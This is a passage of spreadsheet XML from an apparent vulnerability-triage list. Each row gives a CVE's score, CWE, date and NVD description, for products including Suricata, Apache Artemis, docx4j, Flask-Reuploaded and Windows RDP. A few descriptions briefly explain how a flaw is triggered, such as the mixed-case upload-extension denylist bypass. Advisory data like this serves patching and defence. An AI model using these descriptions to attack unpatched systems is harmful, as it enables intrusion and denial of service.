          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.6.1 and iPadOS 26.6.1, macOS Sequoia 15.8, macOS Tahoe 26.6.2, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28935</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28938</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed by moving sensitive data. This issue is fixed in iOS 26.6 and iPadOS 26.6. An app may be able to fingerprint the user.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28938</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33963</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in camera in Samsung Mobile Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500, 2600, and 1680. A stack-based buffer overflow occurs when a malformed message is sent to the camera driver, causing a denial of service.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33963</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43789</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr"/>
      <c r="Q587" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access user-sensitive data.</t>
        </is>
      </c>
      <c r="S587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43789</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45759</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr"/>
      <c r="Q588" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata could repeatedly perform expensive parsing of large HTTP `Content-Disposition` headers during HTTP response body processing. Crafted HTTP traffic could cause excessive CPU usage and denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, use a rule like `alert http1 any any -&gt; any any (sid: 1; http.request_header; content: "Content-Disposition:"; startswith; bsize: &gt; 8192; bypass;)`.</t>
        </is>
      </c>
      <c r="S588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45759</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45765</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr"/>
      <c r="Q589" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, DNP3 reassembly could buffer data without sufficient parser-level bounds. Crafted DNP3 traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable DNP3 (which is not enabled by default) if it is not needed, and/or define a limited `stream.reassembly.depth` (0 or absent is unlimited).</t>
        </is>
      </c>
      <c r="S589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45765</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45766</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr"/>
      <c r="Q590" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, certain NFS parser state structures were insufficiently bounded. Crafted NFS traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable NFS application-layer parsing if it is not needed.</t>
        </is>
      </c>
      <c r="S590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45766</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45768</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr"/>
      <c r="Q591" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, LDAP transaction state could store an unbounded number of responses. Because LDAP can be processed over UDP, crafted traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Version 8.0.5 contains a fix. As a workaround, disable LDAP application-layer parsing where it is not required. Alternatively, use a rule like `alert ldap any any -&gt; any any (sid: 1; ldap.responses.count: &gt;1024; bypass;)`.</t>
        </is>
      </c>
      <c r="S591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45768</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45769</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr"/>
      <c r="Q592" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5,IKEv2 parser state could grow without bounds while storing client transforms. Repeated crafted UDP traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 fix the issue. Some workarounds are available. Disable IKE application-layer parsing if it is not needed. Alternatively, use a rule to bypass ike flows after the first packets like `alert ike any any -&gt; any any (sid: 2; flow.pkts_toserver: &gt; 256; bypass; noalert;)`.</t>
        </is>
      </c>
      <c r="S592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45769</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45770</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr"/>
      <c r="Q593" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, a Lua rule that registers too many flow variables can corrupt Lua detection state and may bypass Suricata's restricted Lua sandbox. This requires an affected Lua script/rule to be loaded. Excessive flow variables being registered may also cause Suricata to crash. Version 8.0.5 contains a fix. As a workaround, disable `security.lua.allow-rules` unless Lua rules are required.</t>
        </is>
      </c>
      <c r="S593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45770</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46352</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr"/>
      <c r="Q594" s="5" t="inlineStr">
        <is>
          <t>CWE-833</t>
        </is>
      </c>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, Suricata's IP defragmentation code could deadlock when processing fragmented traffic containing an encapsulated tunnel protocol whose payload is itself fragmented. Version 8.0.5 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46352</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49362</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr"/>
      <c r="Q595" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can create arbitrary durable queues via the CORE protocol, leading to unauthorized broker state manipulation and potential denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49362</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49363</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr"/>
      <c r="Q596" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker connecting with the CORE protocol can discover cluster node details by sending a SUBSCRIBE_TOPOLOGY request prior to authentication.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49363</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53752</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr"/>
      <c r="Q597" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770</t>
        </is>
      </c>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>docx4j is an open source Java library for creating, editing, and saving OpenXML packages, including DOCX, PPTX, and XLSX files. Prior to 11.5.14, PropertyResolver and adjacent helpers recursively follow the WordprocessingML w:basedOn style inheritance chain without cycle detection. A well-formed DOCX containing mutually based styles causes unbounded recursion in PropertyResolver.fillPPrStack and related effective-style resolution paths, resulting in StackOverflowError. Server-side conversion and table-of-contents processing of an untrusted document can terminate a worker thread, degrade a thread pool, or deny service, although isolation in disposable workers or safe containment of StackOverflowError can reduce the practical effect. The fix adds cyclic-style tracking and CyclicStylesException handling. This issue is fixed in version 11.5.14.</t>
        </is>
      </c>
      <c r="S597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53752</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54567</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr"/>
      <c r="Q598" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-434</t>
        </is>
      </c>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>Flask-Reuploaded provides file uploads for Flask. From 1.5.0 until 1.6.0, UploadSet.save(storage, name=...) in src/flask_uploads/flask_uploads.py applies lowercase_ext to the default upload path but uses the case-preserving extension helper for a caller-supplied name before extension_allowed evaluates an AllExcept denylist. An attacker who controls the name override can use a mixed-case dangerous extension to bypass a lowercase denylist and store the file in the served upload directory. Exploitation requires a denylist configuration, a user-influenced name override, and a deployment that resolves or executes extensions case-insensitively; pure allowlists remain protected and path containment is not bypassed. On an execution-capable upload directory, the stored file can execute with the web server's privileges and affect confidentiality, integrity, and availability. This issue is fixed in version 1.6.0.</t>
        </is>
      </c>
      <c r="S598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54567</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr">
        <is>
          <t>microsoft:remote_desktop_client</t>
        </is>
      </c>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr"/>
      <c r="Q599" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
